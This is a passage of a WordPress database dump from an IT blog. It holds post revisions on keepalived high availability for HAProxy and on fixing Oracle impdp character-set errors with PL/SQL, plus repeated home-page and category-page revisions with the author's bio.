{\n interface ens160\n state BACKUP\n priority 100\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.200\n unicast_peer {\n 192.168.1.201\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally you have to restart the service and enable it for next startups:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl enable keepalived\nsystemctl restart keepalived</pre>\n<!-- /wp:syntaxhighlighter/code -->','Setup High Availability for HAProxy','','inherit','closed','closed','','615-revision-v1','','','2022-12-03 09:39:52','2022-12-03 09:39:52','',615,'http://ictbank.ir/blog/?p=622',0,'revision','',0),
(624,2,'2022-12-03 11:36:10','2022-12-03 11:36:10','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\" ORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n','IMPDP Errors: ORA-02374, ORA-12899','','inherit','closed','closed','','56-revision-v1','','','2022-12-03 11:36:10','2022-12-03 11:36:10','',56,'http://ictbank.ir/blog/?p=624',0,'revision','',0),
(630,2,'2022-12-03 12:18:28','2022-12-03 12:18:28','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','publish','closed','closed','','category-database','','','2024-04-13 06:41:48','2024-04-13 06:41:48','',0,'http://ictbank.ir/blog/?page_id=630',0,'page','',0),
(631,2,'2022-12-03 12:18:26','2022-12-03 12:18:26','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 12:18:26','2022-12-03 12:18:26','',630,'http://ictbank.ir/blog/?p=631',0,'revision','',0),
(632,2,'2022-12-03 13:07:14','2022-12-03 13:07:14','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 13:07:14','2022-12-03 13:07:14','',630,'http://ictbank.ir/blog/?p=632',0,'revision','',0),
(633,2,'2022-12-03 13:07:14','2022-12-03 13:07:14','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 13:07:14','2022-12-03 13:07:14','',630,'http://ictbank.ir/blog/?p=633',0,'revision','',0),
(634,2,'2022-12-03 13:07:14','2022-12-03 13:07:14','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 13:07:14','2022-12-03 13:07:14','',630,'http://ictbank.ir/blog/?p=634',0,'revision','',0),
(635,2,'2022-12-03 13:07:32','2022-12-03 13:07:32','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 13:07:32','2022-12-03 13:07:32','',630,'http://ictbank.ir/blog/?p=635',0,'revision','',0),
(636,2,'2022-12-03 13:07:32','2022-12-03 13:07:32','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 13:07:32','2022-12-03 13:07:32','',630,'http://ictbank.ir/blog/?p=636',0,'revision','',0),
(637,2,'2022-12-03 13:07:32','2022-12-03 13:07:32','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2022-12-03 13:07:32','2022-12-03 13:07:32','',630,'http://ictbank.ir/blog/?p=637',0,'revision','',0),
(647,2,'2023-04-17 18:46:54','2023-04-17 18:46:54','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','publish','closed','closed','','home-page','','','2025-09-23 14:19:21','2025-09-23 14:19:21','',0,'https://ictbank.ir/blog/?page_id=647',0,'page','',0),
(648,2,'2023-04-17 18:43:20','2023-04-17 18:43:20','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:43:20','2023-04-17 18:43:20','',647,'https://ictbank.ir/blog/?p=648',0,'revision','',0),
(650,2,'2023-04-17 18:55:15','2023-04-17 18:55:15','<!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2023-04-17 18:55:15','2023-04-17 18:55:15','',51,'https://ictbank.ir/blog/?p=650',0,'revision','',0),
(651,2,'2023-04-17 18:56:08','2023-04-17 18:56:08','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:56:08','2023-04-17 18:56:08','',647,'https://ictbank.ir/blog/?p=651',0,'revision','',0),
(652,2,'2023-04-17 18:56:08','2023-04-17 18:56:08','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:56:08','2023-04-17 18:56:08','',647,'https://ictbank.ir/blog/?p=652',0,'revision','',0),
(653,2,'2023-04-17 18:56:09','2023-04-17 18:56:09','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:56:09','2023-04-17 18:56:09','',647,'https://ictbank.ir/blog/?p=653',0,'revision','',0),
(655,2,'2023-04-17 18:59:55','2023-04-17 18:59:55','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:59:55','2023-04-17 18:59:55','',647,'https://ictbank.ir/blog/?p=655',0,'revision','',0),
(656,2,'2023-04-17 18:59:55','2023-04-17 18:59:55','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:59:55','2023-04-17 18:59:55','',647,'https://ictbank.ir/blog/?p=656',0,'revision','',0),
(657,2,'2023-04-17 18:59:55','2023-04-17 18:59:55','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" 